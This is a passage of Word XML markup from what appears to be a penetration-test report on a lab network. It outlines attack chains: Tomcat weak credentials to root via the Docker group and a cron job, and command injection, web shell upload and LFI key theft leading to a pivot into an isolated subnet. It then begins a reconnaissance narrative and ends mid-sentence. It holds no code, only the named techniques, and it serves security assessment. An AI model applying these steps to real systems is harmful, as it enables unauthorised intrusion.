      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Scan and enumerate VulnWeb (10.0.2.178)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F936413" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Exploit weak Tomcat credentials → shell as user stocznia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04732F0F" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: stocznia → redlowo (file ownership) → extract password hash → sopot (Docker group) → root (cron job)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0F331" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Full root access on VulnWeb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE871A" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path 2: ServerMeta to SecretMachine - Network Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1C44B" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Reconnaissance: Scan and enumerate ServerMeta (10.0.3.190)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02042E8B" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Initial Access: Exploit web vulnerabilities (RCE via command injection or SSTI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A2DEF" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Upload web shell via file upload vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4126CE" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Use LFI to extract SSH key at /home/public/key_Zain.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A9CDB" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Pivoting</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Use stolen SSH key to access SecretMachine (10.0.4.141)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E04651" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Access to isolated Subnet 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF65336" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE32AE4" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Each attack path follows the same methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF13270" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Reconnaissance: Network scanning and service enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7628C2B5" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Exploitation: Gain initial access through identified vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C299A9" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Post-Exploitation: Privilege escalation (VulnWeb) or credential harvesting (ServerMeta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D9E46" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Objective Achievement: Root access (VulnWeb) or network pivoting (ServerMeta → SecretMachine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157D53D" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B24DA4" w14:textId="27F05DAE" w:rsidR="00140952" w:rsidRPr="00D77DFE" w:rsidRDefault="00346094" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc223521121"/>
      <w:bookmarkStart w:id="85" w:name="ApacheTomcatChain51"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache Tomcat </w:t>
      </w:r>
      <w:r w:rsidR="00AB0FB0" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chain:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>From Tomcat RCE</w:t>
      </w:r>
      <w:r w:rsidR="00690249" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Remote Code Execution)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="5384E943" w14:textId="7F118815" w:rsidR="00140952" w:rsidRPr="00D77DFE" w:rsidRDefault="00140952" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc223521122"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 reconnaissance and scanning </w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.2.178</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:p w14:paraId="5367C4B4" w14:textId="0ED57FBF" w:rsidR="00647F5C" w:rsidRPr="00D77DFE" w:rsidRDefault="00647F5C" w:rsidP="00B251B3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The assessment began by defining the in</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>scope networks: 10.0.2.0/24, 10.0.3.0/24, and 10.0.4.0/24. The tester first enumerated the 10.0.2.0/24 subnet using nmap, identifying 10.0.2.178 as an active host</w:t>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="87" w:name="paragraph35"/>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource35"</w:instrText>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.18</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. An ICMP sweep confirmed the system’s availability, and a manual ping 10.0.2.178 was performed to rule out false positives</w:t>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as show in </w:t>
      </w:r>
      <w:bookmarkStart w:id="88" w:name="paragraph36"/>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource36"</w:instrText>
      </w:r>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.19</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005D2B04" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F3682" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B332A6" w14:textId="1FF1289D" w:rsidR="00CF0400" w:rsidRPr="00D77DFE" w:rsidRDefault="00CF0400" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The results reveal three accessible services on the target</w:t>
      </w:r>
      <w:r w:rsidR="00123285">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, i.e. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>22/tcp SSH</w:t>
      </w:r>
      <w:r w:rsidR="00140952" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>8009/tcp Apache JServ (AJP13)</w:t>
      </w:r>
      <w:r w:rsidR="00140952" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>8080/tcp HTTP</w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Hypertext Transfer Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
